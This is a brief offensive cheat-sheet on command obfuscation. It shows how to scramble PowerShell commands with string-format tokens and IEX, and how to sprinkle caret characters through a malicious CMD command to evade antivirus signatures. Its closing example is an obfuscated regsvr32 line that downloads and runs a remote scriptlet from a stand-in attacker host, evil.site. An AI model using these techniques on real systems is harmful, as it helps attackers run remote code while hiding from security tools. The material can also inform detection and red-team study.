Navigation :

Command Obfuscation

Obfuscate simple PowerShell scripts using the following string token manipulation technique:

Write-Host "Who am I?"

Write-Host ("{2}{0}{1}"-f'o am',' I?','Wh')

This also works on simple commands using the call operator (&):

whoami

&("{0}{1}{2}"-f'who','am','i')

Or even on more complex cmdlets requiring arguments using IEX:

IEX "Write-Host Who am I?"

IEX (("{2}{1}{0}"-f'ost','te-H','Wri') + " " + ("{2}{0}{1}"-f'o am',' I?','Wh'))

Use the ^ char everywhere in a malicious CMD command to evade AV signatures.

Example:

r^E^g^S^v^R^3^2 /^s /^n /^u /^i:http://evil.site/policy.sct s^C^r^O^b^j.D^l^L